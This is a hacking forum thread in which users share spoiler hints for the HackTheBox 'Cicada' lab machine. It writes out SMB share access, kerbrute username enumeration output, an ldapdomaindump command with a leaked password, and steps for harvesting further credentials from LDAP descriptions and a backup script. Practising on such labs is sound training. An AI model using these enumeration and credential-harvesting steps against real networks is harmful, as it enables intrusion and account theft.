Possibly Related Threads…

kevindragonfly · (This post was last modified: Sep 28, 2024, 03:21 PM by kevindragonfly.)

[HTB] - Cicada
https://app.hackthebox.com/machines/627

4 hours left.

hackemall · Sep 28, 2024, 07:12 PM

lets do this windows box about time

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

wtfduw · Sep 28, 2024, 07:21 PM

You can find an open SMB share: smbclient \\\\IP_ADDRESS\\DEV -N
And inside of it you'll find an HR note with a password: Cicada$M6Corpb*@Lp#nZp!8
There's another share named DEV with access denied

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

terk12 · Sep 28, 2024, 07:22 PM

There is a smb share opened that contains a password

hackemall · Sep 28, 2024, 07:31 PM

kerbrute Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 > Using KDC(s):
2024/09/28 14:25:50 > 10.10.11.35:88

2024/09/28 14:25:51 > [+] VALID USERNAME: michael.wrightson@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: sarah.dantelia@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: john.smoulder@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: emily.oscars@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: david.orelious@cicada.htb
2024/09/28 14:25:51 > Done! Tested 5 usernames (5 valid) in 0.073 seconds

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

grieving7 · Sep 28, 2024, 07:41 PM

(Sep 28, 2024, 07:31 PM)hackemall Wrote: kerbrute Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 > Using KDC(s):
2024/09/28 14:25:50 > 10.10.11.35:88

2024/09/28 14:25:51 > [+] VALID USERNAME: michael.wrightson@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: sarah.dantelia@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: john.smoulder@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: emily.oscars@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: david.orelious@cicada.htb
2024/09/28 14:25:51 > Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

hackemall · Sep 28, 2024, 07:49 PM

─(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.11.35/DEV -U david.orelious

Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 12:31:39 2024
.. D 0 Thu Mar 14 12:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 17:28:22 2024

4168447 blocks of size 4096. 334899 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> exit

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

osamy7593 · Sep 28, 2024, 08:02 PM

(Sep 28, 2024, 07:49 PM)hackemall Wrote: ─(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.11.35/DEV -U david.orelious

Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 12:31:39 2024
.. D 0 Thu Mar 14 12:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 17:28:22 2024

4168447 blocks of size 4096. 334899 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> exit

no passwords work what u used>?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

hackemall · Sep 28, 2024, 08:02 PM

use ldapdomaindump
ldapdomaindum ldap://10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
Once dumped, open domain_users.html and find another password in description field for david.orelious
Use David Orelious creds to access DEV shares and download the Backup_script.ps1
Inside you will find emily.oscars creds

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

notluken · Sep 28, 2024, 08:04 PM

(Sep 28, 2024, 07:41 PM)grieving7 Wrote:
(Sep 28, 2024, 07:31 PM)hackemall Wrote: kerbrute Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 > Using KDC(s):
2024/09/28 14:25:50 > 10.10.11.35:88

2024/09/28 14:25:51 > [+] VALID USERNAME: michael.wrightson@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: sarah.dantelia@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: john.smoulder@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: emily.oscars@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: david.orelious@cicada.htb
2024/09/28 14:25:51 > Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,543	27 minutes ago Last Post: popoler
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,795	7 hours ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,598	Yesterday, 05:05 PM Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,218	Yesterday, 02:10 PM Last Post: kkkato
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	417	Apr 29, 2026, 10:36 PM Last Post: op334